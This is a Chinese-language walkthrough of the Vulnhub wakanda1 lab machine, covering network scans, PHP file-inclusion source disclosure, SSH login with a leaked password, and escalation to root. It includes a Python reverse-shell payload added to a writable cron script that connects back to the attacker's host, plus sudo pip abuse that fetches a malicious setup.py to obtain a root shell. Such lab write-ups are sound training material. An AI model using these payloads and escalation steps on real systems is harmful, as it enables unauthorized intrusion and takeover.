Vulnhub靶机-wakanda1

靶机下载

用Virtualbox导入靶机时出现错误Implementation of the USB 2.0 controller not found!，到官网安装Oracle VM VirtualBox Extension Pack即可解决。

使用了virtualbox中的kali。

信息收集

靶机和kali都用桥接模式，在同一局域网中。使用ip a查看Kali的IP地址和子网掩码

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:b5:85:ee brd ff:ff:ff:ff:ff:ff
    inet 192.168.1.101/24 brd 192.168.1.255 scope global dynamic noprefixroute eth0
       valid_lft 86120sec preferred_lft 86120sec
    inet6 fe80::a00:27ff:feb5:85ee/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever

用nmap查看同一局域网的存活主机。nmap -sP 192.168.1.101/24

Starting Nmap 7.70 ( https://nmap.org ) at 2020-01-17 17:32 CST
Nmap scan report for 192.168.1.1 (192.168.1.1)
Host is up (0.0015s latency).
MAC Address: B4:DE:DF:5D:FE:70 (Unknown)
Nmap scan report for 192.168.1.2 (192.168.1.2)
Host is up (0.0030s latency).
MAC Address: FC:7C:02:9C:00:59 (Unknown)
Nmap scan report for laptop-lkst0l6r (192.168.1.3)
Host is up (0.00040s latency).
MAC Address: 00:0E:C6:BB:D2:3F (Asix Electronics)
Nmap scan report for wakanda1 (192.168.1.4)
Host is up (0.00073s latency).
MAC Address: 08:00:27:3C:1E:DB (Oracle VirtualBox virtual NIC)
Nmap scan report for k (192.168.1.101)
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.97 seconds

其中靶机是wakanda1（192.168.1.4），kali是k（192.168.1.101），物理机是laptop（192.168.1.3）

扫描一下端口，看看有什么服务。

nmap -sS -p- 192.168.1.4
Starting Nmap 7.70 ( https://nmap.org ) at 2020-01-17 15:18 CST
Nmap scan report for wakanda1 (192.168.1.4)
Host is up (0.00020s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
80/tcp    open  http
111/tcp   open  rpcbind
3333/tcp  open  dec-notes
44362/tcp open  unknown
MAC Address: 08:00:27:3C:1E:DB (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.80 seconds

80端口有一个web服务，3333是ssh端口

漏洞探测

用Nikto扫描网站漏洞

nikto -h http://192.168.1.4
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.4
+ Target Hostname:    192.168.1.4
+ Target Port:        80
+ Start Time:         2020-01-17 15:30:03 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2020-01-17 15:30:55 (GMT8) (52 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

在nikto里没有看到有用的信息，再使用dirb枚举目录。

dirb http://192.168.1.4

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Jan 17 15:32:17 2020
URL_BASE: http://192.168.1.4/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.4/ ----
+ http://192.168.1.4/admin (CODE:200|SIZE:0)                                   
+ http://192.168.1.4/backup (CODE:200|SIZE:0)                                  
+ http://192.168.1.4/index.php (CODE:200|SIZE:1527)                            
+ http://192.168.1.4/secret (CODE:200|SIZE:0)                                  
+ http://192.168.1.4/server-status (CODE:403|SIZE:299)                         
+ http://192.168.1.4/shell (CODE:200|SIZE:0)                                   
                                                                               
-----------------
END_TIME: Fri Jan 17 15:32:19 2020
DOWNLOADED: 4612 - FOUND: 6

访问了admin,backup等url，没有得到信息。

查看index.php源码，发现一行注释

<!-- <a class="nav-link active" href="?lang=fr">Fr/a> -->

说明index.php有切换语言的功能，可以接受lang参数，可能存在文件包含。

漏洞利用

尝试利用php伪协议读index

http://192.168.1.4/index.php?lang=php://filter/convert.base64-encode/resource=index

得到了编码的index.php

PD9waHAKJHBhc3N3b3JkID0iTmlhbWV5NEV2ZXIyMjchISEiIDsvL0kgaGF2ZSB0byByZW1lbWJlciBpdAoKaWYgKGlzc2V0KCRfR0VUWydsYW5nJ10pKQp7CmluY2x1ZGUoJF9HRVRbJ2xhbmcnXS4iLnBocCIpOwp9Cgo/PgoKCgo8IURPQ1RZUEUgaHRtbD4KPGh0bWwgbGFuZz0iZW4iPjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJjb250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCI+CiAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEsIHNocmluay10by1maXQ9bm8iPgogICAgPG1ldGEgbmFtZT0iZGVzY3JpcHRpb24iIGNvbnRlbnQ9IlZpYnJhbml1bSBtYXJrZXQiPgogICAgPG1ldGEgbmFtZT0iYXV0aG9yIiBjb250ZW50PSJtYW1hZG91Ij4KCiAgICA8dGl0bGU+VmlicmFuaXVtIE1hcmtldDwvdGl0bGU+CgoKICAgIDxsaW5rIGhyZWY9ImJvb3RzdHJhcC5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CgogICAgCiAgICA8bGluayBocmVmPSJjb3Zlci5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CiAgPC9oZWFkPgoKICA8Ym9keSBjbGFzcz0idGV4dC1jZW50ZXIiPgoKICAgIDxkaXYgY2xhc3M9ImNvdmVyLWNvbnRhaW5lciBkLWZsZXggdy0xMDAgaC0xMDAgcC0zIG14LWF1dG8gZmxleC1jb2x1bW4iPgogICAgICA8aGVhZGVyIGNsYXNzPSJtYXN0aGVhZCBtYi1hdXRvIj4KICAgICAgICA8ZGl2IGNsYXNzPSJpbm5lciI+CiAgICAgICAgICA8aDMgY2xhc3M9Im1hc3RoZWFkLWJyYW5kIj5WaWJyYW5pdW0gTWFya2V0PC9oMz4KICAgICAgICAgIDxuYXYgY2xhc3M9Im5hdiBuYXYtbWFzdGhlYWQganVzdGlmeS1jb250ZW50LWNlbnRlciI+CiAgICAgICAgICAgIDxhIGNsYXNzPSJuYXYtbGluayBhY3RpdmUiIGhyZWY9IiMiPkhvbWU8L2E+CiAgICAgICAgICAgIDwhLS0gPGEgY2xhc3M9Im5hdi1saW5rIGFjdGl2ZSIgaHJlZj0iP2xhbmc9ZnIiPkZyL2E+IC0tPgogICAgICAgICAgPC9uYXY+CiAgICAgICAgPC9kaXY+CiAgICAgIDwvaGVhZGVyPgoKICAgICAgPG1haW4gcm9sZT0ibWFpbiIgY2xhc3M9ImlubmVyIGNvdmVyIj4KICAgICAgICA8aDEgY2xhc3M9ImNvdmVyLWhlYWRpbmciPkNvbWluZyBzb29uPC9oMT4KICAgICAgICA8cCBjbGFzcz0ibGVhZCI+CiAgICAgICAgICA8P3BocAogICAgICAgICAgICBpZiAoaXNzZXQoJF9HRVRbJ2xhbmcnXSkpCiAgICAgICAgICB7CiAgICAgICAgICBlY2hvICRtZXNzYWdlOwogICAgICAgICAgfQogICAgICAgICAgZWxzZQogICAgICAgICAgewogICAgICAgICAgICA/PgoKICAgICAgICAgICAgTmV4dCBvcGVuaW5nIG9mIHRoZSBsYXJnZXN0IHZpYnJhbml1bSBtYXJrZXQuIFRoZSBwcm9kdWN0cyBjb21lIGRpcmVjdGx5IGZyb20gdGhlIHdha2FuZGEuIHN0YXkgdHVuZWQhCiAgICAgICAgICAgIDw/cGhwCiAgICAgICAgICB9Cj8+CiAgICAgICAgPC9wPgogICAgICAgIDxwIGNsYXNzPSJsZWFkIj4KICAgICAgICAgIDxhIGhyZWY9IiMiIGNsYXNzPSJidG4gYnRuLWxnIGJ0bi1zZWNvbmRhcnkiPkxlYXJuIG1vcmU8L2E+CiAgICAgICAgPC9wPgogICAgICA8L21haW4+CgogICAgICA8Zm9vdGVyIGNsYXNzPSJtYXN0Zm9vdCBtdC1hdXRvIj4KICAgICAgICA8ZGl2IGNsYXNzPSJpbm5lciI+CiAgICAgICAgICA8cD5NYWRlIGJ5PGEgaHJlZj0iIyI+QG1hbWFkb3U8L2E+PC9wPgogICAgICAgIDwvZGl2PgogICAgICA8L2Zvb3Rlcj4KICAgIDwvZGl2PgoKCgogIAoKPC9ib2R5PjwvaHRtbD4=

解码后得到了密码

<?php
$password ="Niamey4Ever227!!!" ;//I have to remember it

if (isset($_GET['lang']))
{
include($_GET['lang'].".php");
}

?>

网站没有后台，尝试用这个密码登录ssh，一开始登录root，登录不上。在网站首页找到Made by[@mamadou](http://192.168.1.4/#)，登录mamadou成功。

获取信息

登录后默认的shell是python，切换到bash

import pty
pty.spawn("/bin/bash")

找找flag

find / -name "*flag*"

看到home的mamadou和devops里有flag1和flag2。flag1可以直接读，flag2提示permission denied。尝试sudo，提示mamadou不在suders file（当然）。

在/tmp下看到一个test文件

ls /tmp -la
total 32
drwxrwxrwt  7 root   root      4096 Jan 17 03:23 .
drwxr-xr-x 22 root   root      4096 Aug  1  2018 ..
drwxrwxrwt  2 root   root      4096 Jan 16 22:18 .font-unix
drwxrwxrwt  2 root   root      4096 Jan 16 22:18 .ICE-unix
-rw-r--r--  1 devops developer    4 Jan 17 03:33 test
drwxrwxrwt  2 root   root      4096 Jan 16 22:18 .Test-unix
drwxrwxrwt  2 root   root      4096 Jan 16 22:18 .X11-unix
drwxrwxrwt  2 root   root      4096 Jan 16 22:18 .XIM-unix

可以看到test是由devops创建的，时间明显晚于其他文件，猜测有程序定期生成test文件（？），在/srv下找到了这个文件（？），.antivirus.py。

ls /srv -la

total 12
drwxr-xr-x  2 root   root      4096 Aug  1  2018 .
drwxr-xr-x 22 root   root      4096 Aug  1  2018 ..
-rw-r--rw-  1 devops developer   36 Aug  1  2018 .antivirus.py

cat /srv/.antivirus.py

open('/tmp/test','w').write('test')

这个文件所有人都可以修改，可以修改内容反弹shell。在文件后加入内容

import socket,subprocess,os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.1.101",1235))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])

在攻击机上监听1235端口

nc -lvvp 1235

等了一会得到了devpos的shell，可以读到flag2了。

提权

查看devops的权限

sudo -l
sudo -l
Matching Defaults entries for devops on Wakanda1:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User devops may run the following commands on Wakanda1:
    (ALL) NOPASSWD: /usr/bin/pip

无密码只能运行pip，可以利用fakepip提权，其实只要利用phpstudy就行。

下载好setup.py，把LHOST改为kali的ip，放到phpstudy网站根目录，在kali上监听端口，然后在windows上下载setup.py并利用fakepip反弹shell即可。

root@k:~$ nc -lvvp 13372

devops@wakanda1:~$ wget http://192.168.1.3/setup.py
devops@wakanda1:~$ sudo /usr/bin/pip install . --upgrade --force-reinstall

在kali上会收到root的shell，第三个flag在/root/root.txt

参考文章：FreeBuf文章